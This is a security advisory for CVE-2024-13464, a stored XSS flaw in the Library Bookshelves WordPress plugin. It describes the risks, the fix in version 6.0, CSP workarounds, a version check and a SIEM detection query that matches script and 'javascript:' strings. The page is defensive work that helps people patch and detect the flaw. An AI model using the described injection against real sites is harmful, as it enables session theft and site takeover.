CVE-2024-13464
📋 TL;DR
This stored XSS vulnerability in the Library Bookshelves WordPress plugin allows authenticated attackers with contributor-level access or higher to inject malicious scripts via the 'bookshelf' shortcode. These scripts execute whenever users view compromised pages, potentially stealing session cookies or redirecting visitors. All WordPress sites using this plugin up to version 5.9 are affected.
💻 Affected Systems
- WordPress Library Bookshelves plugin
📦 What is this software?
Library Bookshelves by Photonicgnostic
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator session cookies, take over the WordPress site, install backdoors, deface pages, or redirect visitors to malicious sites.
Likely Case
Attackers inject malicious scripts to steal user session cookies, redirect visitors to phishing pages, or display unwanted advertisements.
If Mitigated
With proper user access controls and content security policies, impact is limited to defacement or minor disruption of affected pages.
🎯 Exploit Status
Exploitation requires authenticated access but is straightforward once attacker has contributor privileges. Public proof-of-concept demonstrates the injection technique.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 6.0 or later
Vendor Advisory: https://plugins.trac.wordpress.org/browser/library-bookshelves/trunk/functions.php#L681
Restart Required: No
Instructions:
1. Log into WordPress admin panel. 2. Navigate to Plugins → Installed Plugins. 3. Find Library Bookshelves plugin. 4. Click 'Update Now' if update available. 5. If no update available, deactivate and delete plugin, then install fresh version 6.0+ from WordPress repository.
🔧 Temporary Workarounds
Remove Contributor Access
allTemporarily restrict contributor-level users from creating or editing posts until patch is applied.
Implement Content Security Policy
allAdd CSP headers to prevent script execution from untrusted sources.
Add to .htaccess: Header set Content-Security-Policy "default-src 'self'; script-src 'self'"
Or add to wp-config.php: header("Content-Security-Policy: default-src 'self'; script-src 'self'");
🧯 If You Can't Patch
- Disable the Library Bookshelves plugin completely
- Implement web application firewall rules to block suspicious shortcode attributes
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin → Plugins → Installed Plugins. If Library Bookshelves version is 5.9 or lower, you are vulnerable.Check Version:
wp plugin list --name=library-bookshelves --field=version (if WP-CLI installed)Verify Fix Applied:
After updating, verify plugin version shows 6.0 or higher in WordPress admin panel.📡 Detection & Monitoring
Log Indicators:
- Unusual shortcode modifications in post/page edit logs
- Multiple failed login attempts followed by successful contributor login
Network Indicators:
- Unexpected script tags in HTTP responses containing 'bookshelf' shortcode
- External script loads from pages using the bookshelf shortcode
SIEM Query:
source="wordpress.log" AND ("bookshelf" AND ("script" OR "onclick" OR "javascript:"))